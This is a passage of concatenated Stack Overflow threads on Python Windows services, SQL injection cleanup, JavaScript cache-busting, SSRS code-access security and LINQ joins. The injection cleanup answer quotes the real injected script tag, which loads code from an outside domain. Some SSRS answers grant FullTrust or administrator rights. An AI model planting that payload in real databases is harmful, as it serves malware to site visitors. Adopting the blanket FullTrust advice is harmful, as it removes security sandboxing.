The full path of the executable (usually C:/Python38/python.exe or C:/WINDOWS/System32/WindowsPowerShell/v1.0/powershell.exe) 5. The script which Python or PowerShell will run (or specify None if your executable is standalone - in which case you don't need pyGlue) 6. The startup directory (or specify None) 7. Any parameters for your script (or for your executable if you have no script) NOTE: This does not make a portable script. The associated '_svc_name.exe' in the dist folder will only work if the executable (and any optional startup directory) actually exist in those locations on the target system Usage: 'pyGlue.exe [options] install|update|remove|start [...]|stop|restart [...]|debug [...]' Options for 'install' and 'update' commands only: --username domain\\username : The Username the service is to run under --password password : The password for the username --startup [manual|auto|disabled|delayed] : How the service starts, default = manual --interactive : Allow the service to interact with the desktop. --perfmonini file: .ini file to use for registering performance monitor data --perfmondll file: .dll file to use when querying the service for performance data, default = perfmondata.dll Options for 'start' and 'stop' commands only: --wait seconds: Wait for the service to actually start or stop. If you specify --wait with the 'stop' option, the service and all dependent services will be stopped, each waiting the specified period. ''' # Import all the modules that make life easy import servicemanager import socket import sys import win32event import win32service import win32serviceutil import win32evtlogutil import os from logging import Formatter, Handler import logging import subprocess # Define the win32api class class Service (win32serviceutil.ServiceFramework): # The following variables are edited by the build.sh script _svc_name_ = "TestService" _svc_display_name_ = "Test Service" _svc_description_ = "Test Running Python Scripts as a Service" service_exe = 'c:/Python27/python.exe' service_script = None service_params = [] service_startDir = None # Initialize the service def __init__(self, args): win32serviceutil.ServiceFramework.__init__(self, args) self.hWaitStop = win32event.CreateEvent(None, 0, 0, None) self.configure_logging() socket.setdefaulttimeout(60) # Configure logging to the WINDOWS Event logs def configure_logging(self): self.formatter = Formatter('%(message)s') self.handler = logHandler() self.handler.setFormatter(self.formatter) self.logger = logging.getLogger() self.logger.addHandler(self.handler) self.logger.setLevel(logging.INFO) # Stop the service def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) win32event.SetEvent(self.hWaitStop) # Run the service def SvcDoRun(self): self.main() # This is the service def main(self): # Log that we are starting servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE, servicemanager.PYS_SERVICE_STARTED, (self._svc_name_, '')) # Fire off the real process that does the real work logging.info('%s - about to call Popen() to run %s %s %s', self._svc_name_, self.service_exe, self.service_script, self.service_params) self.process = subprocess.Popen([self.service_exe, self.service_script] + self.service_params, shell=False, cwd=self.service_startDir) logging.info('%s - started process %d', self._svc_name_, self.process.pid) # Wait until WINDOWS kills us - retrigger the wait for stop every 60 seconds rc = None while rc != win32event.WAIT_OBJECT_0: rc = win32event.WaitForSingleObject(self.hWaitStop, (1 * 60 * 1000)) # Shut down the real process and exit logging.info('%s - is terminating process %d', self._svc_name_, self.process.pid) self.process.terminate() logging.info('%s - is exiting', self._svc_name_) class logHandler(Handler): ''' Emit a log record to the WINDOWS Event log ''' def emit(self, record): servicemanager.LogInfoMsg(record.getMessage()) # The main code if __name__ == '__main__': ''' Create a Windows Service, which, when started, will run an executable with the specified parameters. ''' # Check that configuration contains valid values just in case this service has accidentally # been moved to a server where things are in different places if not os.path.isfile(Service.service_exe): print('Executable file({!s}) does not exist'.format(Service.service_exe), file=sys.stderr) sys.exit(0) if not os.access(Service.service_exe, os.X_OK): print('Executable file({!s}) is not executable'.format(Service.service_exe), file=sys.stderr) sys.exit(0) # Check that any optional startup directory exists if (Service.service_startDir is not None) and (not os.path.isdir(Service.service_startDir)): print('Start up directory({!s}) does not exist'.format(Service.service_startDir), file=sys.stderr) sys.exit(0) if len(sys.argv) == 1: servicemanager.Initialize() servicemanager.PrepareToHostSingle(Service) servicemanager.StartServiceCtrlDispatcher() else: # install/update/remove/start/stop/restart or debug the service # One of those command line options must be specified win32serviceutil.HandleCommandLine(Service) Now there's a bit of editing and you don't want all your services called 'pyGlue'. So there's a script (build.sh) to plug in the bits, create a customized 'pyGlue', and create an '.exe'. It is this '.exe' which gets installed as a Windows Service. Once installed you can set it to run automatically. #!/bin/sh # This script builds a Windows Service that will install/start/stop/remove a service that runs a script # That is, executes Python to run a Python script, or PowerShell to run a PowerShell script, etc if [ $# -lt 6 ]; then echo "Usage: build.sh Name Display Description Executable Script StartupDir [Params]..." exit 0 fi name=$1 display=$2 desc=$3 exe=$4 script=$5 startDir=$6 shift; shift; shift; shift; shift; shift params= while [ $# -gt 0 ]; do if [ "${params}" != "" ]; then params="${params}, " fi params="${params}'$1'" shift done cat pyGlue.py | sed -e "s/pyGlue/${name}/g" | \ sed -e "/_svc_name_ =/s?=.*?= '${name}'?" | \ sed -e "/_svc_display_name_ =/s?=.*?= '${display}'?" | \ sed -e "/_svc_description_ =/s?=.*?= '${desc}'?" | \ sed -e "/service_exe =/s?=.*?= '$exe'?" | \ sed -e "/service_script =/s?=.*?= '$script'?" | \ sed -e "/service_params =/s?=.*?= [${params}]?" | \ sed -e "/service_startDir =/s?=.*?= '${startDir}'?" > ${name}.py cxfreeze ${name}.py --include-modules=win32timezone Installation - copy the '.exe' to the server, and the script to the specified folder. Run the '.exe', as Administrator, with the 'install' option. Open Windows Services, as Administrator, and start your service. For an upgrade, just copy the new version of the script and stop/start the service. Now every server is different - different installations of Python, different folder structures. I maintain a folder for every server, with a copy of pyGlue.py and build.sh. And I create a 'serverBuild.sh' script for rebuilding all the services on that server.
# A script to build all the script based Services on this PC sh build.sh AutoCode 'AutoCode Medical Documents' 'Autocode Medical Documents to SNOMED_CT and AIHW codes' C:/Python38/python.exe autocode.py C:/Users/russell/Documents/autocoding -S -T A: The accepted answer using win32serviceutil works but is complicated and makes debugging and changes harder. It is far easier to use NSSM (the Non-Sucking Service Manager). You write and comfortably debug a normal Python program, and when it finally works you use NSSM to install it as a service in less than a minute: From an elevated (admin) command prompt you run nssm.exe install NameOfYourService and you fill in these options: * *path: (the path to python.exe e.g. C:\Python27\Python.exe) *Arguments: (the path to your python script, e.g. c:\path\to\program.py) By the way, if your program prints useful messages that you want to keep in a log file, NSSM can also handle this and a lot more for you. A: This doesn't answer the original question, but might help other people that want to automatically start a Python script at Windows startup: Have a look at the Windows Task Scheduler instead; it is way easier if you just want to start a script after boot without all the service functionality of a Windows service. Create a new task, select "At startup" as the trigger, "Start program" as the action with "C:\Python39\python.exe" as the program (or wherever your python.exe is) and the full path to your script ("C:...\my_dir\xyz.py") as the argument (you can use " if the path contains spaces). You can also select the path of your script (without the .py file, e.g. "C:...\my_dir") for "start in" if you use relative paths in your script, e.g. for logging. A: https://www.chrisumbel.com/article/windows_services_in_python * *Follow the PySvc.py write-up *Change the DLL folder I know this is old, but I was stuck on this forever. For me, this specific problem was solved by copying this file - pywintypes36.dll From -> Python36\Lib\site-packages\pywin32_system32 To -> Python36\Lib\site-packages\win32 setx /M PATH "%PATH%;C:\Users\user\AppData\Local\Programs\Python\Python38-32;C:\Users\user\AppData\Local\Programs\Python\Python38-32\Scripts;C:\Users\user\AppData\Local\Programs\Python\Python38-32\Lib\site-packages\pywin32_system32;C:\Users\user\AppData\Local\Programs\Python\Python38-32\Lib\site-packages\win32 *Change to the Python folder with cd C:\Users\user\AppData\Local\Programs\Python\Python38-32 *NET START PySvc *NET STOP PySvc
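For what it's worth, that DLL copy step can also be scripted rather than done by hand. A hedged sketch, assuming the standard pywin32 layout under site-packages; the Python version in the path is an assumption, so adjust it for your install:

import shutil
from pathlib import Path

# assumption: adjust this to your actual site-packages location
site_packages = Path(r"C:\Python36\Lib\site-packages")
src_dir = site_packages / "pywin32_system32"
dst_dir = site_packages / "win32"

for dll in src_dir.glob("pywintypes*.dll"):
    # copy each pywintypes DLL next to the win32 modules
    shutil.copy(dll, dst_dir)
    print("copied", dll.name, "->", str(dst_dir))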
{ "language": "en", "url": "https://stackoverflow.com/questions/32404", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "324" }
Q: What's the best way of cleaning up after a SQL Injection? I've been tasked with the maintenance of a nonprofit website that recently fell victim to a SQL injection attack. Someone exploited a form on the site to add text to every available text-like field in the database (varchar, nvarchar, etc.) which, when rendered as HTML, includes and executes a JavaScript file. A Google search of the URL indicates that it's from email spammers based out of Romania or China, but that's not what's important right now. I went through and manually removed the information from the text fields that render on the most visible and popular pages on the site, but I'm curious as to what would be the best programmatic way of removing the text from the other text fields on the site. Obviously there's more that needs to be done (hardening the site against SQL injections, using something like markdown instead of storing HTML, etc.) and I am working on those, but for the time being what I really need is a good way to go in and programmatically remove the injected text. I know what the exact text is, it's the same every time, and it's always appended to the end of any text field. I can't afford to strip out all HTML in the database at this time and I don't know when this happened exactly so I can't just roll back to a backup. Also, the site is on shared hosting and I cannot connect to the database directly with SQL Server tools. I can execute queries against it though, so if there's any way of constructing a SQL update statement to the effect of "hey find all the text fields in all of the tables in the entire database and do this to clean them" that would be the best. A: Restore the data from a recent backup. A: I was a victim too, and you can use this to clean up: UPDATE Table SET TextField = SUBSTRING(TextField, 1, CHARINDEX('</title', TextField) - 1) WHERE (ID IN (SELECT ID FROM Table WHERE (CHARINDEX('</title', Textfield, 1) > 0))) A: Assuming you've fallen victim to the same attack as everyone else, then SQLMenace's code is close. However, that attack uses a number of different script urls, so you'll have to customize it to make sure it matches the url you're seeing in your database. I wrote about it as well, and my solution code included a more-generic cleanup. One important point is that the very first thing you need to do is take down the site. Right now you're actively serving malware to your users, and that could put you in a legal fix later. Put up a placeholder page so your users aren't left in the dark, but don't keep serving up malware. Then you can fix the site to make sure it's no longer vulnerable to injection. The simplest way to do that for this particular attack is to just disable sysobjects/syscolumns permissions for your web user, but you'll want to make a more thorough cleanup as well, or it's only a matter of time until you're cracked again. Then you can use the code provided to clean up the site and put it back live.
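If you would rather drive the cleanup from a script than from pure T-SQL, the same idea can be sketched in a few lines of Python: enumerate the text-like columns and strip the known payload from each. This is a hedged sketch only, assuming pyodbc and a connection string you can execute queries with; the payload constant is a placeholder for the exact injected text, and the sketch deliberately limits itself to varchar/nvarchar columns, since REPLACE cannot update text/ntext columns directly:

import pyodbc

PAYLOAD = '<the exact injected string goes here>'  # placeholder
conn = pyodbc.connect('DRIVER={SQL Server};SERVER=...;DATABASE=...')  # placeholder
cur = conn.cursor()

cur.execute(
    "SELECT TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS "
    "WHERE DATA_TYPE IN ('varchar', 'nvarchar')"
)
for table, column in cur.fetchall():
    # strip the payload wherever it occurs in this column
    sql = ("UPDATE [{0}] SET [{1}] = REPLACE([{1}], ?, '') "
           "WHERE [{1}] LIKE '%' + ? + '%'").format(table, column)
    cur.execute(sql, PAYLOAD, PAYLOAD)
conn.commit()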
A: This will reverse that. It would also be wise to take sysobjects permissions away from the username your site runs with, and of course to sanitize input: DECLARE @T VARCHAR(255),@C VARCHAR(4000) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('if exists (select 1 from ['+@T+'] where ['+@C+'] like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'') begin print ''update ['+@T+'] set ['+@C+']=replace(['+@C+'],''''"></title><script src="http://1.verynx.cn/w.js"></script><!--'''','''''''') where ['+@C+'] like ''''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'''''' end') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor I wrote about this a while back here: Microsoft Has Released Tools To Address SQL Injection Attacks
{ "language": "en", "url": "https://stackoverflow.com/questions/32412", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: How can I force clients to refresh JavaScript files? We are currently working in a private beta and so are still in the process of making fairly rapid changes, although obviously as usage is starting to ramp up, we will be slowing down this process. That being said, one issue we are running into is that after we push out an update with new JavaScript files, the client browsers still use the cached version of the file and they do not see the update. Obviously, on a support call, we can simply inform them to do a Ctrl+F5 refresh to ensure that they get the up-to-date files from the server, but it would be preferable to handle this before that time. Our current thought is to simply attach a version number onto the name of the JavaScript files and then when changes are made, increment the version on the script and update all references. This definitely gets the job done, but updating the references on each release could get cumbersome. As I'm sure we're not the first ones to deal with this, I figured I would throw it out to the community. How are you ensuring clients update their cache when you update your code? If you're using the method described above, are you using a process that simplifies the change? A: For ASP.NET I propose the following solution, with advanced options (debug/release mode, versions): JS or CSS files are included this way: <script type="text/javascript" src="Scripts/exampleScript<%=Global.JsPostfix%>" /> <link rel="stylesheet" type="text/css" href="Css/exampleCss<%=Global.CssPostfix%>" /> Global.JsPostfix and Global.CssPostfix are calculated in the following way in Global.asax: protected void Application_Start(object sender, EventArgs e) { ... string jsVersion = ConfigurationManager.AppSettings["JsVersion"]; bool updateEveryAppStart = Convert.ToBoolean(ConfigurationManager.AppSettings["UpdateJsEveryAppStart"]); int buildNumber = System.Reflection.Assembly.GetExecutingAssembly().GetName().Version.Revision; JsPostfix = ""; #if !DEBUG JsPostfix += ".min"; #endif JsPostfix += ".js?" + jsVersion + "_" + buildNumber; if (updateEveryAppStart) { Random rand = new Random(); JsPostfix += "_" + rand.Next(); } ... } A: As far as I know a common solution is to add a ?<version> to the script's src link. For instance: <script type="text/javascript" src="myfile.js?1500"></script> I assume at this point that there isn't a better way than find-replace to increment these "version numbers" in all of the script tags? You might have a version control system do that for you? Most version control systems have a way to automatically inject the revision number on check-in, for instance. It would look something like this: <script type="text/javascript" src="myfile.js?$$REVISION$$"></script> Of course, there are always better solutions like this one. A: If you're generating the page that links to the JS files, a simple solution is appending the file's last modification timestamp to the generated links. This is very similar to Huppie's answer, but works in version control systems without keyword substitution. It's also better than appending the current time, since that would prevent caching even when the file didn't change at all. A: In PHP: function latest_version($file_name){ echo $file_name."?".filemtime($_SERVER['DOCUMENT_ROOT'] .$file_name); } In HTML: <script type="text/javascript" src="<?php latest_version('/a-o/javascript/almanacka.js'); ?>"></script> How it works: In HTML, write the filepath and name as you would do, but in the function only.
PHP gets the modification time of the file and returns filepath + name + "?" + time of latest change. A: We have been building a SaaS for users and providing them a script to attach in their website page. It was not possible to attach a version to the script, since the user attaches the script to their website for its functionality and I can't force them to change the version each time we update the script. So, we found a way to load the newer version of the script each time the user calls the original script. The script link provided to the user: <script src="https://thesaasdomain.com/somejsfile.js" data-ut="user_token"></script> The script file: if($('script[src^="https://thesaasdomain.com/somejsfile.js?"]').length !== 0) { init(); } else { loadScript("https://thesaasdomain.com/somejsfile.js?" + guid()); } var loadScript = function(scriptURL) { var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.src = scriptURL; head.appendChild(script); } var guid = function() { return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) { var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8); return v.toString(16); }); } var init = function() { // our main code } Explanation: The user has attached the script provided to them in their website, and we check whether the unique token attached to the script exists using a jQuery selector; if not, we load the script dynamically with a newer token (or version). This does call the same script twice, which could be a performance issue, but it really solves the problem of forcing the script not to load from the cache without putting the version in the actual script link given to the user or client. Disclaimer: Do not use if performance is a big issue in your case. A: Google Page-Speed: Don't include a query string in the URL for static resources. Most proxies, most notably Squid up through version 3.0, do not cache resources with a "?" in their URL even if a Cache-control: public header is present in the response. To enable proxy caching for these resources, remove query strings from references to static resources, and instead encode the parameters into the file names themselves. In this case, you can include the version in the URL, e.g. http://abc.com/v1.2/script.js, and use Apache mod_rewrite to redirect the link to http://abc.com/script.js. When you change the version, the client browser will update to the new file. A: The jQuery function getScript can also be used to ensure that a js file is indeed loaded every time the page is loaded. This is how I did it: $(document).ready(function(){ $.getScript("../data/playlist.js", function(data, textStatus, jqxhr){ startProgram(); }); }); Check the function at http://api.jquery.com/jQuery.getScript/ By default, $.getScript() sets the cache setting to false. This appends a timestamped query parameter to the request URL to ensure that the browser downloads the script each time it is requested. A: This usage has been deprecated: https://developer.mozilla.org/en-US/docs/Web/HTML/Using_the_application_cache This answer is only 6 years late, but I don't see this answer in many places... HTML5 has introduced Application Cache, which is used to solve this problem. I was finding that new server code I was writing was crashing old javascript stored in people's browsers, so I wanted to find a way to expire their javascript.
Use a manifest file that looks like this: CACHE MANIFEST # Aug 14, 2014 /mycode.js NETWORK: * and generate this file with a new time stamp every time you want users to update their cache. As a side note, if you add this, the browser will not reload (even when a user refreshes the page) until the manifest tells it to. A: How about adding the filesize as a load parameter? <script type='text/javascript' src='path/to/file/mylibrary.js?filever=<?=filesize('path/to/file/mylibrary.js')?>'></script> So every time you update the file, the "filever" parameter changes. How about when you update the file and your update results in the same file size? What are the odds? A: My colleague just found a reference to that method right after I posted (in reference to css) at http://www.stefanhayden.com/blog/2006/04/03/css-caching-hack/. Good to see that others are using it and it seems to work. I assume at this point that there isn't a better way than find-replace to increment these "version numbers" in all of the script tags? A: In ASP.NET MVC you can use @DateTime.UtcNow.ToString() as the JS file version number. The version number changes automatically with the date, and you force the client's browser to refresh the JS file automatically. I am using this method and it works well. <script src="~/JsFilePath/[email protected]()"></script> A: Not all browsers cache files with '?' in them. To make sure the files were cached as much as possible, I included the version in the filename. So instead of stuff.js?123, I did stuff_123.js I used mod_redirect (I think) in Apache to have stuff_*.js go to stuff.js A: One solution is to append a query string with a timestamp in it to the URL when fetching the resource. This takes advantage of the fact that a browser will not cache resources fetched from URLs with query strings in them. You probably don't want the browser not to cache these resources at all though; it's more likely that you want them cached, but you want the browser to fetch a new version of the file when it is made available. The most common solution seems to be to embed a timestamp or revision number in the file name itself. This is a little more work, because your code needs to be modified to request the correct files, but it means that, e.g. version 7 of your snazzy_javascript_file.js (i.e. snazzy_javascript_file_7.js) is cached on the browser until you release version 8, and then your code changes to fetch snazzy_javascript_file_8.js instead. A: The advantage of using a file.js?V=1 over a fileV1.js is that you do not need to store multiple versions of the JavaScript files on the server. The trouble I see with file.js?V=1 is that you may have dependent code in another JavaScript file that breaks when using the new version of the library utilities. For the sake of backwards compatibility, I think it is much better to use jQuery.1.3.js for your new pages and let existing pages use jQuery.1.1.js, until you are ready to upgrade the older pages, if necessary. A: Use a version GET variable to prevent browser caching. Appending ?v=AUTO_INCREMENT_VERSION to the end of your URL prevents browser caching - avoiding any and all cached scripts. A: Although it is framework specific, Django 1.4 has the staticfiles app functionality, which works in a similar fashion to the 'greenfelt' site in the above answer. A: Cache Busting in ASP.NET Core via a tag helper will handle this for you and allow your browser to keep cached scripts/css until the file changes.
Simply add the tag helper asp-append-version="true" to your script (js) or link (css) tag: <link rel="stylesheet" href="~/css/site.min.css" asp-append-version="true"/> Dave Paquette has a good example and explanation of cache busting here (bottom of page): Cache Busting A: location.reload(true); see https://www.w3schools.com/jsref/met_loc_reload.asp I dynamically call this line of code to ensure that the javascript has been re-retrieved from the web server instead of from the browser's cache, in order to escape this problem. A: The common practice nowadays is to generate a content hash code as part of the file name to force the browser (especially IE) to reload the javascript or css files. For example, vendor.a7561fb0e9a071baadb9.js main.b746e3eb72875af2caa9.js It is generally the job of build tools such as webpack. Here are more details if anyone wants to try it out with webpack. A: For ASP.NET pages I am using the following BEFORE <script src="/Scripts/pages/common.js" type="text/javascript"></script> AFTER (force reload) <script src="/Scripts/pages/common.js?ver<%=DateTime.Now.Ticks.ToString()%>" type="text/javascript"></script> Adding the DateTime.Now.Ticks works very well. A: Appending the current time to the URL is indeed a common solution. However, you can also manage this at the web server level, if you want to. The server can be configured to send different HTTP headers for javascript files. For example, to force the file to be cached for no longer than 1 day, you would send: Cache-Control: max-age=86400, must-revalidate For beta, if you want to force the user to always get the latest, you would use: Cache-Control: no-cache, must-revalidate A: One simple way: edit .htaccess RewriteEngine On RewriteBase / RewriteCond %{REQUEST_URI} \.(jpe?g|bmp|png|gif|css|js|mp3|ogg)$ [NC] RewriteCond %{QUERY_STRING} !^(.+?&v33|)v=33[^&]*(?:&(.*)|)$ [NC] RewriteRule ^ %{REQUEST_URI}?v=33 [R=301,L] A: You can add the file version to your file name, so it will be like: https://www.example.com/script_fv25.js fv25 => file version nr. 25 And in your .htaccess put this block, which will delete the version part from the link: RewriteEngine On RewriteRule (.*)_fv\d+\.(js|css|txt|jpe?g|png|svg|ico|gif) $1.$2 [L] so the final link will be: https://www.example.com/script.js A: FRONT-END OPTION I made this code specifically for those who can't change any settings on the backend. In this case the best way to prevent a very long cache is with: new Date().getTime() However, for most programmers the cache can be a few minutes or hours, so the simple code above ends up forcing all users to re-download everything on each page they browse.
To specify how long this item will remain cached without reloading, I made this code and left several examples below: // cache-expires-after.js v1 function cacheExpiresAfter(delay = 1, prefix = '', suffix = '') { // seconds let now = new Date().getTime().toString(); now = now.substring(now.length - 11, 10); // remove decades and milliseconds now = parseInt(now / delay).toString(); return prefix + now + suffix; }; // examples (of the delay argument): // the value changes every 1 second var cache = cacheExpiresAfter(1); // see the sync setInterval(function(){ console.log(cacheExpiresAfter(1), new Date().getSeconds() + 's'); }, 1000); // the value changes every 1 minute var cache = cacheExpiresAfter(60); // see the sync setInterval(function(){ console.log(cacheExpiresAfter(60), new Date().getMinutes() + 'm:' + new Date().getSeconds() + 's'); }, 1000); // the value changes every 5 minutes var cache = cacheExpiresAfter(60 * 5); // OR 300 // the value changes every 1 hour var cache = cacheExpiresAfter(60 * 60); // OR 3600 // the value changes every 3 hours var cache = cacheExpiresAfter(60 * 60 * 3); // OR 10800 // the value changes every 1 day var cache = cacheExpiresAfter(60 * 60 * 24); // OR 86400 // usage example: let head = document.head || document.getElementsByTagName('head')[0]; let script = document.createElement('script'); script.setAttribute('src', '//unpkg.com/[email protected]/dist/sweetalert.min.js' + cacheExpiresAfter(60 * 5, '?')); head.append(script); // this works? let waitSwal = setInterval(function() { if (window.swal) { clearInterval(waitSwal); swal('Script successfully injected', script.outerHTML); }; }, 100); A: Simplest solution? Don't let the browser cache at all. Append the current time (in ms) as a query. (You are still in beta, so you could make a reasonable case for not optimizing for performance. But YMMV here.) A: The below worked for me: <head> <meta charset="UTF-8"> <meta http-equiv="cache-control" content="no-cache, must-revalidate, post-check=0, pre-check=0" /> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> </head> A: If you are using PHP and JavaScript then the following should work for you, especially in the situation where you are changing the file many times, so you cannot change its version every time. The idea is to create a random number in PHP and then assign it as the version of the JS file. $fileVersion = rand(); <script src="addNewStudent.js?v=<?php echo $fileVersion; ?>"></script> A: <script> var version = new Date().getTime(); var script = document.createElement("script"); script.src = "app.js?=" + version; document.body.appendChild(script); </script> Feel free to delete this if someone's already posted it somewhere in the plethora of answers above. A: A simple trick that works fine for me to prevent conflicts between older and newer javascript files. That means: If there is a conflict and some error occurs, the user will be prompted to press Ctrl-F5. At the top of the page add something like <h1 id="welcome"> Welcome to this page <span style="color:red">... press Ctrl-F5</span></h1> so that the red "... press Ctrl-F5" hint is visible while the page loads. Let this line of javascript be the last to be executed when loading the page: document.getElementById("welcome").innerHTML = "Welcome to this page" In case no error occurs, the welcome greeting above will hardly be visible and will almost immediately be replaced by the plain "Welcome to this page" heading. A: You can do this with .htaccess. Add the following lines into your .htaccess file: # DISABLE CACHING <IfModule mod_headers.c> <FilesMatch "\.js$"> Header set Cache-Control "no-store, max-age=0" </FilesMatch> </IfModule>
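The same no-cache headers can of course be sent by any server, not only via .htaccess. For illustration, a minimal Python http.server sketch that forbids caching of .js files; this is a development-only toy, not a production server:

from http.server import SimpleHTTPRequestHandler, HTTPServer

class NoJsCacheHandler(SimpleHTTPRequestHandler):
    def end_headers(self):
        # add the no-cache header for .js responses before finishing headers
        if self.path.endswith(".js"):
            self.send_header("Cache-Control", "no-store, max-age=0")
        super().end_headers()

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8000), NoJsCacheHandler).serve_forever()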
{ "language": "en", "url": "https://stackoverflow.com/questions/32414", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "691" }
Q: How do I resolve a System.Security.SecurityException with custom code in SSRS? I've created an assembly and referenced it in my Reporting Services report. I've tested the report locally (works), and I then uploaded the report to a report server (doesn't work). Here is the error that is thrown by the custom code I've written. System.Security.SecurityException: Request for the permission of type 'System.Security.Permissions.SecurityPermission, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' failed. at System.Security.CodeAccessSecurityEngine.CheckNReturnSO(PermissionToken permToken, CodeAccessPermission demand, StackCrawlMark& stackMark, Int32 unrestrictedOverride, Int32 create) at System.Security.CodeAccessSecurityEngine.Assert(CodeAccessPermission cap, StackCrawlMark& stackMark) at System.Security.CodeAccessPermission.Assert() at [Snipped Method Name] at ReportExprHostImpl.CustomCodeProxy.[Snipped Method Name] The action that failed was: Demand The type of the first permission that failed was: System.Security.Permissions.SecurityPermission The Zone of the assembly that failed was: MyComputer This project is something I inherited, and I'm not intimately familiar with it. I do have the code (now), though, so I can at least work with it :) I believe the code that is failing is this: Dim fio As System.Security.Permissions.FileIOPermission = New System.Security.Permissions.FileIOPermission(Security.Permissions.PermissionState.Unrestricted) fio.Assert() However, this kind of stuff is everywhere too: Private Declare Function CryptHashData Lib "advapi32.dll" (ByVal hhash As Integer, ByVal pbData As String, ByVal dwDataLen As Integer, ByVal dwFlags As Integer) As Integer I can see either of these being things that Reporting Services would not accommodate out of the box. A: This is how I was able to solve the issue: *strongly sign the custom assembly in question *modify the rssrvpolicy.config file to add permissions for the assembly <CodeGroup class="UnionCodeGroup" version="1" PermissionSetName="FullTrust" Name="Test" Description="This code group grants the Test code full trust. "> <IMembershipCondition class="StrongNameMembershipCondition" version="1" PublicKeyBlob="0024000004800000940100000602000000240000575341310004000001000100ab4b135615ca6dfd586aa0c5807b3e07fa7a02b3f376c131e0442607de792a346e64710e82c833b42c672680732f16193ba90b2819a77fa22ac6d41559724b9c253358614c270c651fad5afe9a0f8cbd1e5e79f35e0f04cb3e3b020162ac86f633cf0d205263280e3400d1a5b5781bf6bd12f97917dcdde3c8d03ee61ccba2c0" /> </CodeGroup> Side note: here is a great way to get the public key blob of your assembly: VS trick for obtaining the public key token and blob of a signed assembly. A: <system.web> <trust level="Full"/> </system.web> try this in web.config A: Run your service in administrator mode A: <CodeGroup class="FirstMatchCodeGroup" version="1" PermissionSetName="FullTrust"> For me, the solution was changing the above line in the rssrvpolicy.config file from "None" to "FullTrust".
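If you have to apply that edit across several report servers, it can be scripted. A hedged Python sketch that flips a named CodeGroup to FullTrust; the config path and group name are assumptions, and you should back up the file before touching it:

import xml.etree.ElementTree as ET

# assumption: adjust to the real rssrvpolicy.config location on your server
CONFIG = r"C:\path\to\ReportServer\rssrvpolicy.config"

tree = ET.parse(CONFIG)
for group in tree.iter("CodeGroup"):
    if group.get("Name") == "Test":  # the group you added for your assembly
        group.set("PermissionSetName", "FullTrust")
tree.write(CONFIG, encoding="utf-8", xml_declaration=True)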
{ "language": "en", "url": "https://stackoverflow.com/questions/32428", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "13" }
Q: Creating a LINQ select from multiple tables This query works great: var pageObject = (from op in db.ObjectPermissions join pg in db.Pages on op.ObjectPermissionName equals page.PageName where pg.PageID == page.PageID select op) .SingleOrDefault(); I get a new type with my 'op' fields. Now I want to retrieve my 'pg' fields as well, but select op, pg).SingleOrDefault(); doesn't work. How can I select everything from both tables so that they appear in my new pageObject type? A: You can use anonymous types for this, i.e.: var pageObject = (from op in db.ObjectPermissions join pg in db.Pages on op.ObjectPermissionName equals page.PageName where pg.PageID == page.PageID select new { pg, op }).SingleOrDefault(); This will make pageObject an instance of an anonymous type, so AFAIK you won't be able to pass it around to other methods; however, if you're simply obtaining data to play with in the method you're currently in, it's perfectly fine. You can also name properties in your anonymous type, i.e.:- var pageObject = (from op in db.ObjectPermissions join pg in db.Pages on op.ObjectPermissionName equals page.PageName where pg.PageID == page.PageID select new { PermissionName = pg, ObjectPermission = op }).SingleOrDefault(); This will enable you to say:- if (pageObject.PermissionName.FooBar == "golden goose") Application.Exit(); For example :-) A: If you don't want to use anonymous types b/c let's say you're passing the object to another method, you can use the LoadWith load option to load associated data. It requires that your tables are associated either through foreign keys or in your Linq-to-SQL dbml model. db.DeferredLoadingEnabled = false; DataLoadOptions dlo = new DataLoadOptions(); dlo.LoadWith<ObjectPermissions>(op => op.Pages); db.LoadOptions = dlo; var pageObject = from op in db.ObjectPermissions select op; // no join needed Then you can call pageObject.Pages.PageID Depending on what your data looks like, you'd probably want to do this the other way around, DataLoadOptions dlo = new DataLoadOptions(); dlo.LoadWith<Pages>(p => p.ObjectPermissions); db.LoadOptions = dlo; var pageObject = from p in db.Pages select p; // no join needed var objectPermissionName = pageObject.ObjectPermissions.ObjectPermissionName; A: You must create a new anonymous type: select new { op, pg } Refer to the official guide. A: If the anonymous type causes trouble for you, you can create a simple data class: public class PermissionsAndPages { public ObjectPermissions Permissions {get;set;} public Pages Pages {get;set;} } and then in your query: select new PermissionsAndPages { Permissions = op, Pages = pg }; Then you can pass this around: return queryResult.SingleOrDefault(); // as PermissionsAndPages A: change select op) to select new { op, pg })
{ "language": "en", "url": "https://stackoverflow.com/questions/32433", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "54" }
